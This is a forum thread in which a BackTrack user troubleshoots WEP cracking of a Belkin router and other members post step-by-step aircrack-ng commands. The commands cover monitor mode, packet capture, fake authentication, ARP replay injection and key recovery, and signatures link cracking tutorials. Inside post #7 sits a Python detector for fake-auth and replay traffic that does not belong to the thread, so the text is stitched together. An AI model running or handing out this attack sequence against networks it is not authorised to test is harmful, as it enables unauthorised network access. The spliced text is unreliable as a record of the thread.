Page 1 of 3, results 1 to 10 of 23

Thread: how to use airdump, aireplay, aircrack

  1. #1 how to use airdump, aireplay, aircrack

    Hi,

    Using BackTrack, got a Belkin router & Belkin wireless card.

    Can't seem to get my head around this below. I have started the monitor using airmon-ng start eth1 & it confirms monitor mode enabled.

    I use the command iwconfig & I get:
    eth1 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318"
    Mode:Monitor Frequency=2.484 GHz Access Point: Invalid

    Now I notice that the Access Point shows Invalid as above.
    I then stop airmon-ng & restart doing
    airmon-ng start eth1 11 (where 11 is my channel)

    I then start airodump-ng eth1 & get my BSSID for my router, & I then open a new shell & run the following.

    I have tried both ways:

    aireplay-ng -1 0 -e myrouter -a (my router mac) -h (my card MAC) eth1

    & method below

    aireplay-ng -1 6000 -o 1 -q 10 -e myrouter -a (my router mac) -h (CARD MAC ADDRESS) eth1

    but all I seem to keep getting is

    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request

    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate iwconfig <iface> rate 1M

    Can anyone shed some light on this? Also, does the driver need to be configured in any way?

  2. #2 (Senior Member, joined Apr 2007, 3,385 posts)

    Unplug card, re-insert it, then....

    airmon-ng stop eth1
    airmon-ng start eth1 11
    airodump-ng -c 11 --bddid (AP MAC) eth1
    aireplay-ng -1 0 -a (my router mac) -h (my card MAC) eth1

    The -e option is useless and considered a waste of time and energy by me in the aireplay-ng -1 0 command.
    --=Xploitz=-- ®
    Remote-Exploit.org's Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial": http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases": http://forums.remote-exploit.org/showthread.php?t=8041

  3. #3

    OK, I loaded BackTrack,
    removed card & re-inserted it.

    Done:
    airmon-ng stop eth1
    airmon-ng start eth1 11
    airodump-ng -c 11 --bddid (AP MAC) eth1
    **--bddid unknown - so I take it you meant --bssid
    This then gives me my SSID & I'm getting beacons.
    I then did
    aireplay-ng -1 0 -a (my router mac) -h (my card MAC) eth1
    but it says
    **please specify a -e BSSID**

    So I'm still kinda stuck, as it's not sending packets,
    or more to the point, it's not injecting packets. I check the airodump shell & I don't get any data, or any #s.

    Is there anything else I can try?
    Thanks

  4. #4 (Junior Member, joined Oct 2006, 33 posts)

    Did you use:

    aireplay-ng -1 0 -e (essid) -a (my router mac) -h (my card MAC) eth1

    after it told you to add the essid? That should associate your card to the AP. Then you need to use:

    aireplay-ng -3 -b (my router mac) -h (my card mac) eth1

    to actually start injecting.

  5. #5 (Developer, joined Mar 2007, 6,126 posts)

    Injection in Broadcom is sketchy.

  6. #6

    Hi Mike27, after it asked me to add the essid, I then did the below:

    aireplay-ng -1 0 -e belkin54g -a (my router mac) -h (my card MAC) eth1
    & it still did
    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate iwconfig <iface> rate 1M

    I have not tried the below as yet, as after seeing the above it may not work;
    I will try again later when I get home.
    aireplay-ng -3 -b (my router mac) -h (my card mac) eth1

    Is there anything else I can also try?

  7. #7 (Senior Member, joined Apr 2007, 3,385 posts)

    Take a look at my video here...

    http://forums.remote-exploit.org/showthread.php?t=7633

    Even though it's for an Atheros chipped card....it should help you. Just don't do the airmon-ng start wifi0 command..ehh..here's a script specifically for you, not an Atheros card...

    airmon-ng stop eth1
    airmon-ng start eth1 11
    airodump-ng -c 11 --bssid (AP MAC) eth1

    Now..open a new shell window while letting airodump run and type....

    aireplay-ng -1 0 -e essid -a (my router mac) -h (my card MAC) eth1
    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1
    Now wait.....look at your airodump window and wait for the IVs to increase. Then when you get enough data/IVs...
    aircrack-ng --bssid (AP MAC) whatever-01.cap (if you know it's 64 or 128 bit encryption..add the -n 64 or -n 128 option to aircrack.)

    Now I added the -e option in the aireplay-ng line 'cause it may just be my Atheros that will disallow the essid and still work...but listen to purehate..Broadcom is at best half-assed and sketchy...please buy a real card like an Atheros or Realtek chipped card. Much less complications..if any.
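As an added example (not code from the thread or from the aircrack-ng project), here is a small Python detector that flags, in a frame log, the two traffic patterns the commands in this post generate: a burst of authentication requests from a single station (the aireplay-ng -1 step) and a flood of identical-length data frames replayed by one station (the aireplay-ng -3 step). The log format, the sample frames and the thresholds are assumptions constructed for the example.

```python
from collections import defaultdict

# Constructed sample log (hypothetical format, not any real tool's output):
# "<seconds> <src MAC> <dst MAC> <kind> <payload bytes>". Station 00:11:... fires
# authentication requests, then replays one 68-byte data frame; 66:77:... is normal.
SAMPLE_LOG = "\n".join(
    [f"{0.1 * i:.2f} 00:11:22:33:44:55 00:aa:bb:cc:dd:ee auth-req 0" for i in range(6)]
    + [f"{1.0 + 0.05 * i:.2f} 00:11:22:33:44:55 00:aa:bb:cc:dd:ee data 68" for i in range(25)]
    + ["5.00 66:77:88:99:aa:bb 00:aa:bb:cc:dd:ee auth-req 0",
       "5.50 66:77:88:99:aa:bb 00:aa:bb:cc:dd:ee data 1400",
       "6.00 66:77:88:99:aa:bb 00:aa:bb:cc:dd:ee data 312"])

def parse_log(text):
    """Parse the constructed log into (time, src, dst, kind, length) tuples."""
    frames = []
    for line in text.splitlines():
        if line.strip():
            t, src, dst, kind, length = line.split()
            frames.append((float(t), src, dst, kind, int(length)))
    return frames

def _burst(times, window, threshold):
    """True if at least `threshold` timestamps fall inside some `window`-second span."""
    times = sorted(times)
    start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False

def detect(frames, window=2.0, auth_threshold=5, replay_threshold=20):
    """Return sorted (alert, src MAC) pairs. Thresholds are assumed; tune per site."""
    auth = defaultdict(list)                        # src -> auth-req timestamps
    data = defaultdict(lambda: defaultdict(list))   # src -> length -> timestamps
    for t, src, _dst, kind, length in frames:
        if kind == "auth-req":
            auth[src].append(t)
        elif kind == "data":
            data[src][length].append(t)
    # Many auth requests in a short span from one station: the fake-auth pattern.
    alerts = [("fake-auth-burst", s) for s, ts in auth.items()
              if _burst(ts, window, auth_threshold)]
    # Many identical-length data frames in a short span from one station: ARP replay.
    for src, by_len in data.items():
        if any(_burst(ts, window, replay_threshold) for ts in by_len.values()):
            alerts.append(("arp-replay", src))
    return sorted(alerts)
```

A normal client authenticates once and sends frames of varying size, so the second station in the sample raises no alert.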

  8. #8 still doesn't work

    Darn, this still doesn't work - I may need to get me a new wireless card.
    Atheros you say?

    eBay item number 330150397916

    This one any good?

  9. #9 (Senior Member, joined Apr 2007, 3,385 posts)

    Per our PMs..I told ya to buy the card I have. It's good..it works right out of the box..you can mod it with an external antenna..it's cheap, and it's Atheros chipped Super G!

    Airlink AWLC 4130

  10. #10

    I've been searching eBay & can't find any Airlink AWLC 4130, searching worldwide & only have PCI cards - I need a PCMCIA card or a USB - maybe it's just not meant for me.
